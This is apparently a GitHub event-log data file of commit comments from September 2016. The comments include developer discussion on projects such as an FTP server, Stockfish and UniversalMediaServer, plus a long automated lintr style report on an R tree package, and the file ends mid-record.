{"id":"4615132091","type":"CommitCommentEvent","actor":{"login":"andrewarrow"},"repo":{"name":"andrewarrow/paradise_ftp"},"payload":{"comment":{"id":19165944,"position":null,"line":null,"path":null,"commit_id":"a468505bea391a8db659d7b74eba86884a94aeac","created_at":"2016-09-25T23:23:56Z","updated_at":"2016-09-25T23:23:56Z","body":"I added the SetDeadline to the Listener because otherwise .Accept() will block and the moment the bool FinishAndStop is true, I need it to stop accepting new connections."}},"created_at":"2016-09-25T23:23:56Z"}
{"id":"4615134700","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19165948,"position":null,"line":null,"path":null,"commit_id":"9591a4274684e52249bc62c4454af20ad63e319e","created_at":"2016-09-25T23:25:47Z","updated_at":"2016-09-25T23:25:47Z","body":"For ceylon/ceylon-ide-intellij#502, FTR."}},"created_at":"2016-09-25T23:25:47Z"}
{"id":"4615136575","type":"CommitCommentEvent","actor":{"login":"mrjbq7"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19165949,"position":null,"line":null,"path":null,"commit_id":"e32e45e59062ba4c9c75415c11ed81f069d8302f","created_at":"2016-09-25T23:27:13Z","updated_at":"2016-09-25T23:27:13Z","body":"Why not pass as args to a MAIN, like ``./factor -run=benchmark benchmark.gc1 benchmark.gc2`` ?"}},"created_at":"2016-09-25T23:27:13Z"}
{"id":"4615136956","type":"CommitCommentEvent","actor":{"login":"RosadinTV"},"repo":{"name":"RosadinTV/RosadinTV.github.io"},"payload":{"comment":{"id":19165950,"position":null,"line":null,"path":null,"commit_id":"805b30033ebe5b963f257882ab0e0b30a6eb73d3","created_at":"2016-09-25T23:27:28Z","updated_at":"2016-09-25T23:27:28Z","body":"Aun no hay fecha estimada pero seguro será antes de fin de año y vendrá con muchas novedades 😄 "}},"created_at":"2016-09-25T23:27:28Z"}
{"id":"4615137059","type":"CommitCommentEvent","actor":{"login":"Rashed97"},"repo":{"name":"lg-devs/proprietary_vendor_lge"},"payload":{"comment":{"id":19165951,"position":null,"line":null,"path":null,"commit_id":"42754beef8991e7ea188df2062f75a85ab08eb0c","created_at":"2016-09-25T23:27:34Z","updated_at":"2016-09-25T23:27:34Z","body":"Yeah. I'll get it later. Not at a computer at the moment.\n\nOn Sun, Sep 25, 2016, 4:32 AM Altaf-Mahdi <notifications@github.com> wrote:\n\n> Hey @Rashed97 <https://github.com/Rashed97>, would you be able to grab\n> libllvm-qgl.so which would fully enable vulkan?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lg-devs/proprietary_vendor_lge/commit/42754beef8991e7ea188df2062f75a85ab08eb0c#commitcomment-19162947>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB4TAH04OcWfB_DytLajPeRNXyUU5oVrks5qtjGzgaJpZM4KF2hp>\n> .\n>\n-- \n\nThanks,\nRashed Abdel-Tawab\n"}},"created_at":"2016-09-25T23:27:34Z"}
{"id":"4615137775","type":"CommitCommentEvent","actor":{"login":"kann23"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19165955,"position":null,"line":null,"path":null,"commit_id":"19985a667b6c39b57cce38ebaf51a5bcfc838a78","created_at":"2016-09-25T23:28:04Z","updated_at":"2016-09-25T23:28:04Z","body":"Wow, that's embarrassing!  \r\n\r\nThanks for your insights!  I will look more deeply into the code and try to make an efficient implementation.  I hope I'm not overtesting this idea.  \r\n\r\nI guess something like\r\n\r\nif(sf == 31.0/64 || sf == 9.0/64)\r\n{\r\n  score *= 1.0 - pos.rule50_count()/100.0;\r\n}\r\n\r\nor generally\r\n\r\nif((sf == 31.0/64 || sf == 9.0/64) && pos.rule50_count() > ply)\r\n{\r\n  score *= (100.0 - pos.rule50_count()) / (100.0 - ply); // as you pointed out in ef8957d \r\n}\r\n\r\nThanks so much for pointing this out to me.  I'm sorry that I didn't check before running the tune."}},"created_at":"2016-09-25T23:28:04Z"}
{"id":"4615138095","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"19smitgr/19smitgr.github.io"},"payload":{"comment":{"id":19165958,"position":null,"line":null,"path":null,"commit_id":"0938d2b2bc466877c39deac57cd4baaffcd67313","created_at":"2016-09-25T23:28:19Z","updated_at":"2016-09-25T23:28:19Z","body":"Haha, yep, the spacing was bothering me."}},"created_at":"2016-09-25T23:28:19Z"}
{"id":"4615140677","type":"CommitCommentEvent","actor":{"login":"valib"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19165966,"position":null,"line":null,"path":null,"commit_id":"c53b3a0c1c492984c985ded660d8bad827c7948d","created_at":"2016-09-25T23:30:20Z","updated_at":"2016-09-25T23:30:20Z","body":"@SubJunk you disabled automatic merging but there are still some minor changes like this which should be possible to merge without making the PR. If somebody like @Sami32 merge the PR without approval we have still abbility to revert the commit. I made some PRs whose nobody reviuwed and not be merged so when this happened I think that developers should be allowed to merge those PRs after some time without asking the permition. Silence should mean agreement."}},"created_at":"2016-09-25T23:30:20Z"}
{"id":"4615140781","type":"CommitCommentEvent","actor":{"login":"moonstruckminun"},"repo":{"name":"po-devs/po-server-goodies"},"payload":{"comment":{"id":19165967,"position":null,"line":null,"path":null,"commit_id":"1586891793d95f2f8fe08fa85d0a88c132b8b3ef","created_at":"2016-09-25T23:30:25Z","updated_at":"2016-09-25T23:30:25Z","body":"Not sure why but this isn't advertising in safari at all anymore it seems. Instead it sent the message in Mafia.\r\n\r\nI don't see how it could be related to this edit though... maybe Safari was being updated or otherwise not accessible when mafia was updated? Meaning safchan was never correctly defined?"}},"created_at":"2016-09-25T23:30:25Z"}
{"id":"4615143299","type":"CommitCommentEvent","actor":{"login":"arundasan91"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19165975,"position":null,"line":null,"path":null,"commit_id":"65038b084059cf934df50fa86dba5b0e765f9d65","created_at":"2016-09-25T23:32:21Z","updated_at":"2016-09-25T23:32:21Z","body":"Thanks."}},"created_at":"2016-09-25T23:32:21Z"}
{"id":"4615144701","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"19smitgr/19smitgr.github.io"},"payload":{"comment":{"id":19165977,"position":null,"line":null,"path":null,"commit_id":"0938d2b2bc466877c39deac57cd4baaffcd67313","created_at":"2016-09-25T23:33:33Z","updated_at":"2016-09-25T23:33:33Z","body":"I can't believe how long I didn't realize you stole credit from me..."}},"created_at":"2016-09-25T23:33:33Z"}
{"id":"4615145357","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"19smitgr/19smitgr.github.io"},"payload":{"comment":{"id":19165979,"position":null,"line":null,"path":null,"commit_id":"14646d7caa3d014ef17678dc71afc3ea0fff57d8","created_at":"2016-09-25T23:34:03Z","updated_at":"2016-09-25T23:34:03Z","body":"Thank you!\n\nOn Sun, Sep 25, 2016 at 7:26 PM, Garrett Smith <notifications@github.com>\nwrote:\n\n> Add note about working with @zacharyacutey\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/19smitgr/19smitgr.github.io/commit/\n> 14646d7caa3d014ef17678dc71afc3ea0fff57d8\n>\n"}},"created_at":"2016-09-25T23:34:03Z"}
{"id":"4615146226","type":"CommitCommentEvent","actor":{"login":"moonstruckminun"},"repo":{"name":"po-devs/po-server-goodies"},"payload":{"comment":{"id":19165981,"position":null,"line":null,"path":null,"commit_id":"1586891793d95f2f8fe08fa85d0a88c132b8b3ef","created_at":"2016-09-25T23:34:44Z","updated_at":"2016-09-25T23:34:44Z","body":"\"Have you tried turning it off and back on again?\"\r\n\r\nJust restarted Mafia and it worked fine after that :x"}},"created_at":"2016-09-25T23:34:44Z"}
{"id":"4615149636","type":"CommitCommentEvent","actor":{"login":"kann23"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19165985,"position":null,"line":null,"path":null,"commit_id":"28593ffb339cef7baba476d8463e8b80681701c0","created_at":"2016-09-25T23:37:29Z","updated_at":"2016-09-25T23:37:29Z","body":"Thank you!  Sorry for wasting resources."}},"created_at":"2016-09-25T23:37:29Z"}
{"id":"4615151281","type":"CommitCommentEvent","actor":{"login":"fclairamb"},"repo":{"name":"andrewarrow/paradise_ftp"},"payload":{"comment":{"id":19165989,"position":null,"line":null,"path":null,"commit_id":"93f9ce78463f8f77220506019b5b761580a5e607","created_at":"2016-09-25T23:38:49Z","updated_at":"2016-09-25T23:38:49Z","body":"@andrewarrow Yes, my point is that it can be implemented on the driver's side. We send him 512 bytes and then if he doesn't return an error, we send him the rest of the files by packets of 4MB. My current does everything though a File because it's the easiest way to implement Writer,Seeker,Closer. But on the server side, re-implementing the Writer to check the data on the first write should be pretty straightforward."}},"created_at":"2016-09-25T23:38:49Z"}
{"id":"4615151735","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"abossenbroek/GeneralTree"},"payload":{"comment":{"id":19165991,"position":null,"line":null,"path":null,"commit_id":"37c0d9ceda34eddf721d232f18c7251c065b8ba8","created_at":"2016-09-25T23:39:09Z","updated_at":"2016-09-25T23:39:09Z","body":"[R/benchmark.R:66:13:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/benchmark.R#L66) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​    tree <- GeneralTree$new(id = idx, data = idx)\n            ^~~~~~~~~~~\n```\n[R/benchmark.R:112:11:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/benchmark.R#L112) *warning:* **no visible global function definition for ‘foreach’**\n```r\n​          foreach(i = itx, .combine = c) %do% c(i)\n          ^~~~~~~\n```\n[R/benchmark.R:112:19:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/benchmark.R#L112) *warning:* **no visible binding for global variable ‘i’, Did you mean 'C'?**\n```r\n​          foreach(i = itx, .combine = c) %do% c(i)\n                  ^\n```\n[R/benchmark.R:112:42:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/benchmark.R#L112) *warning:* **no visible global function definition for ‘%do%’, Did you mean '%o%'?**\n```r\n​          foreach(i = itx, .combine = c) %do% c(i)\n                                         ^~~~\n```\n[R/benchmark.R:151:7:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/benchmark.R#L151) *warning:* **no visible global function definition for ‘as.GeneralTree’**\n```r\n​      as.GeneralTree(tree_in_df)\n      ^~~~~~~~~~~~~~\n```\n[R/casting.R:24:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L24) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​as.data.frame.GeneralTree <- function(x, row.names = NULL, optional = NULL,\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/casting.R:69:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L69) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​as.GeneralTree.data.frame <- function(x, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/casting.R:72:14:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​  id_colname = \"id\"\n             ^\n```\n[R/casting.R:73:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​  data_colname = \"data\"\n               ^\n```\n[R/casting.R:74:18:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L74) *style:* **Use <-, not =, for assignment.**\n```r\n​  parent_colname = \"parent\"\n                 ^\n```\n[R/casting.R:75:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​  parent_node = NULL\n              ^\n```\n[R/casting.R:78:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L78) *style:* **Use <-, not =, for assignment.**\n```r\n​    id_colname = dots$id\n               ^\n```\n[R/casting.R:80:18:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L80) *style:* **Use <-, not =, for assignment.**\n```r\n​    data_colname = dots$data\n                 ^\n```\n[R/casting.R:82:20:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L82) *style:* **Use <-, not =, for assignment.**\n```r\n​    parent_colname = dots$parent\n                   ^\n```\n[R/casting.R:84:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L84) *style:* **Use <-, not =, for assignment.**\n```r\n​    parent_node = dots$parent_node\n                ^\n```\n[R/casting.R:97:7:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L97) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if ((sum(is.na(x[parent_colname][, 1])) != 1) && is.null(parent_node))\n      ^\n```\n[R/casting.R:101:12:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L101) *style:* **Use <-, not =, for assignment.**\n```r\n​  new_tree = NULL\n           ^\n```\n[R/casting.R:104:13:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L104) *style:* **Use <-, not =, for assignment.**\n```r\n​    root_id = x[id_colname][is.na(x[parent_colname]), 1]\n            ^\n```\n[R/casting.R:105:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L105) *style:* **Use <-, not =, for assignment.**\n```r\n​    root_data = x[data_colname][is.na(x[parent_colname]), 1]\n              ^\n```\n[R/casting.R:107:14:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L107) *style:* **Use <-, not =, for assignment.**\n```r\n​    new_tree = GeneralTree$new(root_id, root_data)\n             ^\n```\n[R/casting.R:107:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L107) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​    new_tree = GeneralTree$new(root_id, root_data)\n               ^~~~~~~~~~~\n```\n[R/casting.R:111:22:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L111) *style:* **Use <-, not =, for assignment.**\n```r\n​            new_tree = parent_node\n                     ^\n```\n[R/casting.R:121:18:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L121) *style:* **Use <-, not =, for assignment.**\n```r\n​  remaining_data = x[!is.na(x[parent_colname])[, 1],]\n                 ^\n```\n[R/casting.R:121:53:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L121) *style:* **Commas should always have a space after.**\n```r\n​  remaining_data = x[!is.na(x[parent_colname])[, 1],]\n                                                    ^\n```\n[R/casting.R:124:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L124) *style:* **Use <-, not =, for assignment.**\n```r\n​    idx_to_push = 1 : nrow(remaining_data)\n                ^\n```\n[R/casting.R:125:19:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L125) *style:* **Use <-, not =, for assignment.**\n```r\n​    idx_not_found = NULL\n                  ^\n```\n[R/casting.R:127:7:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L127) *style:* **Use <-, not =, for assignment.**\n```r\n​    i = 0\n      ^\n```\n[R/casting.R:129:10:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L129) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(length(idx_to_push) > 0) {\n         ^\n```\n[R/casting.R:133:9:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L133) *style:* **Use <-, not =, for assignment.**\n```r\n​      i = idx_to_push[1]\n        ^\n```\n[R/casting.R:134:18:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L134) *style:* **Use <-, not =, for assignment.**\n```r\n​      current_id = remaining_data[id_colname][i, 1]\n                 ^\n```\n[R/casting.R:135:20:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L135) *style:* **Use <-, not =, for assignment.**\n```r\n​      current_data = remaining_data[data_colname][i, 1]\n                   ^\n```\n[R/casting.R:136:22:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L136) *style:* **Use <-, not =, for assignment.**\n```r\n​      current_parent = remaining_data[parent_colname][i, 1]\n                     ^\n```\n[R/casting.R:138:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L138) *style:* **Use <-, not =, for assignment.**\n```r\n​      new_node = tryCatch(new_tree$addNode(current_parent, current_id,\n               ^\n```\n[R/casting.R:145:21:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L145) *style:* **Use <-, not =, for assignment.**\n```r\n​        idx_to_push = idx_to_push[-1]\n                    ^\n```\n[R/casting.R:149:25:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L149) *style:* **Use <-, not =, for assignment.**\n```r\n​          idx_not_found = idx_not_found[idx_not_found != i]\n                        ^\n```\n[R/casting.R:159:25:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L159) *style:* **Use <-, not =, for assignment.**\n```r\n​        parent_location = which(remaining_data[id_colname][, 1] %in%\n                        ^\n```\n[R/casting.R:161:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L161) *style:* **Use <-, not =, for assignment.**\n```r\n​        pivot = match(parent_location, idx_to_push)\n              ^\n```\n[R/casting.R:163:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L163) *style:* **Use <-, not =, for assignment.**\n```r\n​        tmp_idx = idx_to_push[1]\n                ^\n```\n[R/casting.R:164:24:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L164) *style:* **Use <-, not =, for assignment.**\n```r\n​        idx_to_push[1] = idx_to_push[pivot]\n                       ^\n```\n[R/casting.R:165:28:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L165) *style:* **Use <-, not =, for assignment.**\n```r\n​        idx_to_push[pivot] = tmp_idx\n                           ^\n```\n[R/casting.R:193:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L193) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​as.GeneralTree.expression <- function(x, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/casting.R:217:11:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/casting.R#L217) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​  tree <- GeneralTree$new(0L, \"BaseEnvironment\")\n          ^~~~~~~~~~~\n```\n[R/GeneralTree.R:304:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L304) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.id = id\n              ^\n```\n[R/GeneralTree.R:305:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L305) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.data = data\n                ^\n```\n[R/GeneralTree.R:320:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L320) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​  new_node <- GeneralTree$new(id, data)\n              ^~~~~~~~~~~\n```\n[R/GeneralTree.R:324:25:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L324) *style:* **Use <-, not =, for assignment.**\n```r\n​    private$.left_child = new_node\n                        ^\n```\n[R/GeneralTree.R:328:14:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L328) *style:* **Use <-, not =, for assignment.**\n```r\n​    new_node = parent_node$addChildNode(new_node)\n             ^\n```\n[R/GeneralTree.R:357:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L357) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​  new_node <- GeneralTree$new(id, data)\n              ^~~~~~~~~~~\n```\n[R/GeneralTree.R:361:25:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L361) *style:* **Use <-, not =, for assignment.**\n```r\n​    private$.left_child = new_node\n                        ^\n```\n[R/GeneralTree.R:365:14:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L365) *style:* **Use <-, not =, for assignment.**\n```r\n​    new_node = self$addChildNode(new_node)\n             ^\n```\n[R/GeneralTree.R:382:15:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L382) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​  new_node <- GeneralTree$new(id, data)\n              ^~~~~~~~~~~\n```\n[R/GeneralTree.R:396:21:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L396) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.siblings = c(private$.siblings, list(node))\n                    ^\n```\n[R/GeneralTree.R:489:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L489) *style:* **Use <-, not =, for assignment.**\n```r\n​    sibling_ids = lapply(self$getSiblingNodes(), function(x) x$id)\n                ^\n```\n[R/GeneralTree.R:499:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L499) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.root = node\n                ^\n```\n[R/GeneralTree.R:507:23:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L507) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.left_child = node\n                      ^\n```\n[R/GeneralTree.R:513:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L513) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.data = data\n                ^\n```\n[R/GeneralTree.R:519:19:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L519) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.parent = node\n                  ^\n```\n[R/GeneralTree.R:525:21:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L525) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.siblings = siblings\n                    ^\n```\n[R/GeneralTree.R:571:26:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L571) *warning:* **no visible global function definition for ‘getChildNodes’**\n```r\n​    child_data <- lapply(getChildNodes(self, recursive), function(x) x$data)\n                         ^~~~~~~~~~~~~\n```\n[R/GeneralTree.R:586:26:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L586) *warning:* **no visible global function definition for ‘getChildNodes’**\n```r\n​    child_data <- lapply(getChildNodes(self, recursive), function(x) x$id)\n                         ^~~~~~~~~~~~~\n```\n[R/GeneralTree.R:764:31:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L764) *style:* **Use <-, not =, for assignment.**\n```r\n​  private$.is_root_discovered = is_root_discovered\n                              ^\n```\n[R/GeneralTree.R:790:5:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L790) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(get_id && get_data) {\n    ^\n```\n[R/GeneralTree.R:930:14:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L930) *style:* **Use <-, not =, for assignment.**\n```r\n​    siblings = self$parent$left_child$getSiblingNodes()\n             ^\n```\n[R/GeneralTree.R:994:11:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L994) *style:* **Use <-, not =, for assignment.**\n```r\n​    depth = self$root$treeDepth\n          ^\n```\n[R/GeneralTree.R:996:11:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L996) *style:* **Use <-, not =, for assignment.**\n```r\n​    depth = self$branch_depth\n          ^\n```\n[R/GeneralTree.R:1029:9:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L1029) *style:* **Use <-, not =, for assignment.**\n```r\n​  depth = 1\n        ^\n```\n[R/GeneralTree.R:1032:11:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L1032) *style:* **Use <-, not =, for assignment.**\n```r\n​    depth = max(depth, self$left_child$branch_depth + 1)\n          ^\n```\n[R/GeneralTree.R:1036:11:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L1036) *style:* **Use <-, not =, for assignment.**\n```r\n​    depth = max(depth, sapply(self$siblings, function(x)\n          ^\n```\n[R/GeneralTree.R:1054:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/GeneralTree.R#L1054) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/iterators.R:26:16:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/iterators.R#L26) *warning:* **no visible global function definition for ‘getIterVal.GeneralTreeIter’**\n```r\n​      value <- getIterVal.GeneralTreeIter(obj, 1L)\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iterators.R:97:5:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/iterators.R#L97) *warning:* **local variable ‘iter_object’ assigned but may not be used**\n```r\n​    iter_object <- obj$state$obj\n    ^~~~~~~~~~~\n```\n[R/operators.R:33:17:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/operators.R#L33) *warning:* **no visible binding for global variable ‘GeneralTree’**\n```r\n​    new_tree <- GeneralTree$new(id = x$id, data = x$data)\n                ^~~~~~~~~~~\n```\n[R/operators.R:50:10:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/operators.R#L50) *warning:* **no visible global function definition for ‘deep_clone.GeneralTree’**\n```r\n​    x <- deep_clone.GeneralTree(value)\n         ^~~~~~~~~~~~~~~~~~~~~~\n```\n[R/operators.R:62:10:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/operators.R#L62) *warning:* **no visible global function definition for ‘deep_clone.GeneralTree’**\n```r\n​    x <- deep_clone.GeneralTree(value)\n         ^~~~~~~~~~~~~~~~~~~~~~\n```\n[R/operators.R:65:1:](https://github.com/abossenbroek/GeneralTree/blob/37c0d9ceda34eddf721d232f18c7251c065b8ba8/R/operators.R#L65) *style:* **Trailing blank lines are 